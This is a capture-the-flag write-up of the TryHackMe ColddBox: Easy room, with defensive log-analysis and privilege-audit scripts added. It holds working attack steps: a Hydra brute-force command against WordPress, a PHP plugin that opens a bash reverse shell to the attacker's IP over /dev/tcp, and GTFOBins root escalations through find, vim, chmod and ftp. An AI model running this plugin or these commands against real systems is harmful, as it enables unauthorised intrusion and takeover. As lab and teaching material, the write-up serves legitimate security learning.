TryHackMe: ColddBoxEasy
ColddBox: Easy [https://tryhackme.com/room/colddboxeasy]
Can you get access and get both flags?
Good Luck!
Doubts and / or help in twitter: @C0ldd__ or @ColddSecurity
Thumbnail box image credits, designed by Freepik from www.flaticon.es
Enumeration
Let's break out rustscan ...
rustscan -a ColddBoxEasy -- -sC -sV -oA ColddBoxEasy -v -A
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Nmap? More like slowmap.🐢
[~] The config file is expected to be at "/home/tj/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.209.247:80
Open 10.10.209.247:4512
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-06 21:22 GMT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:22
Completed NSE at 21:22, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:22
Completed NSE at 21:22, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:22
Completed NSE at 21:22, 0.00s elapsed
Initiating Ping Scan at 21:22
Scanning 10.10.209.247 [2 ports]
Completed Ping Scan at 21:22, 0.03s elapsed (1 total hosts)
Initiating Connect Scan at 21:22
Scanning ColddBoxEasy (10.10.209.247) [2 ports]
Discovered open port 80/tcp on 10.10.209.247
Discovered open port 4512/tcp on 10.10.209.247
Completed Connect Scan at 21:22, 0.04s elapsed (2 total ports)
Initiating Service scan at 21:22
Scanning 2 services on ColddBoxEasy (10.10.209.247)
Completed Service scan at 21:22, 7.02s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.209.247.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:22
Completed NSE at 21:23, 1.42s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:23
Completed NSE at 21:23, 0.16s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:23
Completed NSE at 21:23, 0.00s elapsed
Nmap scan report for ColddBoxEasy (10.10.209.247)
Host is up, received syn-ack (0.032s latency).
Scanned at 2021-01-06 21:22:52 GMT for 9s
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.1.31
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: ColddBox | One more machine
4512/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4e:bf:98:c0:9b:c5:36:80:8c:96:e8:96:95:65:97:3b (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDngxJmUFBAeIIIjZkorYEp5ImIX0SOOFtRVgperpxbcxDAosq1rJ6DhWxJyyGo3M+Fx2koAgzkE2d4f2DTGB8sY1NJP1sYOeNphh8c55Psw3Rq4xytY5u1abq6su2a1Dp15zE7kGuROaq2qFot8iGYBVLMMPFB/BRmwBk07zrn8nKPa3yotvuJpERZVKKiSQrLBW87nkPhPzNv5hdRUUFvImigYb4hXTyUveipQ/oji5rIxdHMNKiWwrVO864RekaVPdwnSIfEtVevj1XU/RmG4miIbsy2A7jRU034J8NEI7akDB+lZmdnOIFkfX+qcHKxsoahesXziWw9uBospyhB
| 256 88:17:f1:a8:44:f7:f8:06:2f:d3:4f:73:32:98:c7:c5 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKNmVtaTpgUhzxZL3VKgWKq6TDNebAFSbQNy5QxllUb4Gg6URGSWnBOuIzfMAoJPWzOhbRHAHfGCqaAryf81+Z8=
| 256 f2:fc:6c:75:08:20:b1:b2:51:2d:94:d6:94:d7:51:4f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIE/fNq/6XnAxR13/jPT28jLWFlqxd+RKSbEgujEaCjEc
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:23
Completed NSE at 21:23, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:23
Completed NSE at 21:23, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:23
Completed NSE at 21:23, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.40 seconds
4512/tcp ssh
We do not yet have a username/password so we will skip this and head over to the web port.
80/tcp http
As we can see from the scan, the server is running WordPress, and an old version, 4.1.31.
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.1.31
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: ColddBox | One more machine
User Flag
As we are running an old version of WordPress, let's break out wpscan
╭─tj at kali in ~/pentest/ctfs/ColddBoxEasy on master✘✘✘ 21-01-06 - 21:32:23
╰─⠠⠵ wpscan --url http://ColddBoxEasy -e vp,vt,u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.12
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://colddboxeasy/ [10.10.209.247]
[+] Started: Wed Jan 6 21:32:41 2021
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://colddboxeasy/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] WordPress readme found: http://colddboxeasy/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://colddboxeasy/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.1.31 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://colddboxeasy/?feed=rss2, <generator>https://wordpress.org/?v=4.1.31</generator>
| - http://colddboxeasy/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.1.31</generator>
[+] WordPress theme in use: twentyfifteen
| Location: http://colddboxeasy/wp-content/themes/twentyfifteen/
| Last Updated: 2020-12-09T00:00:00.000Z
| Readme: http://colddboxeasy/wp-content/themes/twentyfifteen/readme.txt
| [!] The version is out of date, the latest version is 2.8
| Style URL: http://colddboxeasy/wp-content/themes/twentyfifteen/style.css?ver=4.1.31
| Style Name: Twenty Fifteen
| Style URI: https://wordpress.org/themes/twentyfifteen
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.0 (80% confidence)
| Found By: Style (Passive Detection)
| - http://colddboxeasy/wp-content/themes/twentyfifteen/style.css?ver=4.1.31, Match: 'Version: 1.0'
[+] Enumerating Vulnerable Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:02 <=============================================> (330 / 330) 100.00% Time: 00:00:02
[+] Checking Theme Versions (via Passive and Aggressive Methods)
[i] No themes Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <===============================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] [REDACTED]
| Found By: Rss Generator (Passive Detection)
[+] [REDACTED]
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] [REDACTED]
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] [REDACTED]
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register
[+] Finished: Wed Jan 6 21:32:49 2021
[+] Requests Done: 360
[+] Cached Requests: 37
[+] Data Sent: 93.274 KB
[+] Data Received: 97.168 KB
[+] Memory used: 227.223 MB
[+] Elapsed time: 00:00:08
Ok, so we have a few users to look at but no vulnerable plugins or themes detected.
- [REDACTED]
- [REDACTED]
- [REDACTED]
- [REDACTED]
Before we try a brute force on any of these, let's take a look around the site....
Hydra Wordpress Brute Force
Ok, so let's try rockyou.txt against the users above
╰─⠠⠵ hydra -L wpusers -P /usr/share/wordlists/rockyou.txt colddboxeasy -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
Success! We have a password quickly via the above
[80][http-post-form] host: colddboxeasy login: [REDACTED] password: [REDACTED]
Checking the user section of WordPress, we can see that we are an admin.
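Seen from the target's side, the Hydra run above appears in the Apache access log as a run of POST /wp-login.php requests answered 200 (failed login) and then one answered 302, the same Location redirect that Hydra's S=Location condition keys on. The detection script below is an added example, not part of the original walkthrough; the log lines, the second client IP, the threshold and the function names are constructed for illustration.

```python
import re
from collections import defaultdict

# Apache common/combined log prefix: client, timestamp, request line, status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)

def detect_wp_bruteforce(lines, threshold=5):
    """Return {ip: {"failures": n, "success_after": ts or None}} for noisy clients.

    WordPress re-renders the login form with 200 on a bad password and answers
    302 on a good one, so N x 200 followed by a 302 means a guess landed.
    """
    failures = defaultdict(int)
    findings = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        if m["path"].split("?", 1)[0] != "/wp-login.php":
            continue
        ip = m["ip"]
        if m["status"] == "200":
            failures[ip] += 1
            if failures[ip] >= threshold:
                entry = findings.setdefault(ip, {"failures": 0, "success_after": None})
                entry["failures"] = failures[ip]
        elif m["status"] == "302" and ip in findings:
            # Only the first redirect after the failure streak is recorded.
            if findings[ip]["success_after"] is None:
                findings[ip]["success_after"] = m["ts"]
    return findings

def sample_log():
    """Constructed log: one user with a typo, then a guessing run from 10.9.5.198."""
    fmt = '{ip} - - [06/Jan/2021:21:{mm}:{ss:02d} +0000] "POST /wp-login.php HTTP/1.0" {st} 3021 "-" "-"'
    lines = [fmt.format(ip="10.10.20.5", mm=39, ss=0, st=200),
             fmt.format(ip="10.10.20.5", mm=39, ss=9, st=302)]
    lines += [fmt.format(ip="10.9.5.198", mm=40, ss=s, st=200) for s in range(8)]
    lines.append(fmt.format(ip="10.9.5.198", mm=40, ss=8, st=302))
    return lines

if __name__ == "__main__":
    for ip, info in detect_wp_bruteforce(sample_log()).items():
        print(ip, info)
```

A finding whose success_after is set is the case to escalate: that account's password should be rotated and its sessions invalidated, not just the source IP blocked.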
Remote Shell
Having a quick look around in there, there are no interesting posts or pages, so let's do our usual trick of uploading a PHP reverse shell as a plugin
<?php
/**
* Plugin Name: Wordpress Maint Shell
* Author: Wordpress
**/
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.9.5.198/4444 0>&1'");
?>
And start the listener on our box
nc -lvnp 4444
Once we zip up, upload and activate the above PHP, we should get a callback....
connect to [10.9.5.198] from (UNKNOWN) [10.10.209.247] 34272
bash: cannot set terminal process group (1402): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ColddBox-Easy:/var/www/html/wp-admin$
www-data@ColddBox-Easy:/var/www/html/wp-admin$
Let's do the usual to get the fancy shell that we do not break with a Ctrl+C ...
www-data@ColddBox-Easy:/var/www/html/wp-admin$ python3 -c 'import pty;pty.spawn("/bin/bash")'
</www/html/wp-admin$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ColddBox-Easy:/var/www/html/wp-admin$ export TERM=xterm
export TERM=xterm
www-data@ColddBox-Easy:/var/www/html/wp-admin$
www-data@ColddBox-Easy:/var/www/html/wp-admin$ ^Z
[1] + 10211 suspended nc -lvnp 4444
╭─tj at kali in ~/pentest/ctfs/ColddBoxEasy on master✘✘✘ 21-01-06 - 21:54:11
╰─⠠⠵ stty raw -echo; fg
[1] + 10211 continued nc -lvnp 4444
www-data@ColddBox-Easy:/var/www/html/wp-admin$
Display all 1365 possibilities? (y or n)
www-data@ColddBox-Easy:/var/www/html/wp-admin$
Looking around the www directory we see a directory called [REDACTED]
www-data@ColddBox-Easy:/var/www/html/[REDACTED]$ cat index.html
<!DOCTYPE html>
<html>
<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=UTF-8″ />
<title>Hidden Place</title>
</head>
<body>
<div align="center">
<h1>U-R-G-E-N-T</h1>
<h2>[REDACTED], you changed [REDACTED]'s password, when you can send it to him so he can continue uploading his articles. [REDACTED]</h2>
</div>
</body>
</html>
Interesting, we will keep a note of that for later.... Anyway, jumping into [REDACTED]'s home directory we have user.txt
Getting the flags
Ok, so I found more than one way to skin this box .....
Method #1 /usr/bin/find
www-data@ColddBox-Easy:/home/[REDACTED]$ cat user.txt
cat: user.txt: Permission denied
Ah well, it's never that easy anymore..... So we need to priv esc to [REDACTED] to be able to read it, so let's grab linpeas.sh and see what we can find.
The first thing that jumps out as the output flies past is /usr/bin/find under SUID ....
www-data@ColddBox-Easy:/tmp$ ls -l /usr/bin/find
-rwsr-xr-x 1 root root 221768 Feb 8 2016 /usr/bin/find
Checking out GTFOBins ....
So let's give it a try
www-data@ColddBox-Easy:/tmp$ /usr/bin/find . -exec /bin/bash -p \; -quit
bash-4.3# id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
Ok, so our effective user ID is root, so let's grab the flags.
bash-4.3# cat /home/[REDACTED]/user.txt
[REDACTED]
bash-4.3# cat /home/[REDACTED]/user.txt | base64 -d
[REDACTED]
bash-4.3# cat /root/root.txt
[REDACTED]
bash-4.3# cat /root/root.txt | base64 -d
[REDACTED]
Method #2 - Password Re-use
Looking in the web root at wp-config.php we see the credentials below for the database:
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'colddbox');
/** MySQL database username */
define('DB_USER', '[REDACTED]');
/** MySQL database password */
define('DB_PASSWORD', '[REDACTED]');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
As the Linux username is the same, let's try the password [REDACTED] ...
$ su - [REDACTED]
Password:
That worked! We are now in as [REDACTED], so we can read the user.txt
[REDACTED]@ColddBox-Easy:~$ ls
user.txt
[REDACTED]@ColddBox-Easy:~$ cat user.txt
[REDACTED]
Let's take a look at whether we can run anything with sudo
[REDACTED]@ColddBox-Easy:~$ sudo -l
[sudo] password for [REDACTED]:
Coincidiendo entradas por defecto para [REDACTED] en ColddBox-Easy:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
El usuario [REDACTED] puede ejecutar los siguientes comandos en ColddBox-Easy:
(root) /usr/bin/vim
(root) /bin/chmod
(root) /usr/bin/ftp
Ok, so we have a few commands there that we can run as root ...
VIM
https://gtfobins.github.io/gtfobins/vim/#sudo
[REDACTED]@ColddBox-Easy:~$ sudo vim -c ':!/bin/sh'
# id
uid=0(root) gid=0(root) grupos=0(root)
# cat /root/root.txt
[REDACTED]
CHMOD
https://gtfobins.github.io/gtfobins/chmod/#sudo
[REDACTED]@ColddBox-Easy:~$ sudo chmod -R 755 /root; cat /root/root.txt
[REDACTED]
FTP
https://gtfobins.github.io/gtfobins/ftp/#sudo
[REDACTED]@ColddBox-Easy:~$ sudo ftp
ftp> !/bin/bash
root@ColddBox-Easy:~# cat /root/root.txt
[REDACTED]
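Both escalation paths above come down to root-privileged binaries that can spawn a shell: the SUID bit on /usr/bin/find in Method #1 and the (root) sudo rules for vim, chmod and ftp in Method #2. The audit script below is an added example, not part of the original walkthrough; it flags such entries in captured ls -l and sudo -l output, and its function names, the four-entry ESCAPE_CAPABLE set and the /usr/bin/passwd control line are assumptions made for illustration.

```python
import posixpath
import re

# Binaries the walkthrough abuses; a real audit would use the full GTFOBins list (assumption).
ESCAPE_CAPABLE = {"find", "vim", "chmod", "ftp"}
# Rule lines read "(runas) [TAG:] /path, /path" in every locale, so match the shape, not the header.
SUDO_RULE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?:\w+:\s*)*(?P<cmds>.+)$")
# ls -l: mode, link count, owner, ..., absolute path as the last field.
LS_LINE = re.compile(r"^(?P<mode>[-dl][-rwxsStT]{9})\S*\s+\d+\s+(?P<owner>\S+)\s.*\s(?P<path>/\S+)$")

def risky_sudo_rules(sudo_l_output):
    """Return (runas, binary) pairs that sudo allows and that can spawn a shell."""
    hits = []
    for line in sudo_l_output.splitlines():
        m = SUDO_RULE.match(line)
        if not m:
            continue
        for cmd in m["cmds"].split(","):
            binary = (cmd.split() or [""])[0]
            if binary == "ALL" or posixpath.basename(binary) in ESCAPE_CAPABLE:
                hits.append((m["runas"], binary))
    return hits

def risky_suid(ls_l_output):
    """Return root-owned SUID files from ls -l output that are escape-capable."""
    hits = []
    for line in ls_l_output.splitlines():
        m = LS_LINE.match(line)
        if (m and m["mode"][3] in "sS" and m["owner"] == "root"
                and posixpath.basename(m["path"]) in ESCAPE_CAPABLE):
            hits.append(m["path"])
    return hits

# sudo -l text as shown in the walkthrough (Spanish locale, user name redacted).
SUDO_L = """\
Coincidiendo entradas por defecto para [REDACTED] en ColddBox-Easy:
El usuario [REDACTED] puede ejecutar los siguientes comandos en ColddBox-Easy:
    (root) /usr/bin/vim
    (root) /bin/chmod
    (root) /usr/bin/ftp
"""
# First line is from the walkthrough; the passwd line is a constructed control.
LS_L = """\
-rwsr-xr-x 1 root root 221768 Feb  8  2016 /usr/bin/find
-rwsr-xr-x 1 root root  54256 Mar 26  2019 /usr/bin/passwd
"""
if __name__ == "__main__":
    print(risky_sudo_rules(SUDO_L))
    print(risky_suid(LS_L))
```

Every hit is a direct route to root for whoever holds that account: drop the SUID bit with chmod u-s where it is not needed, and replace broad sudo rules with narrowly scoped commands.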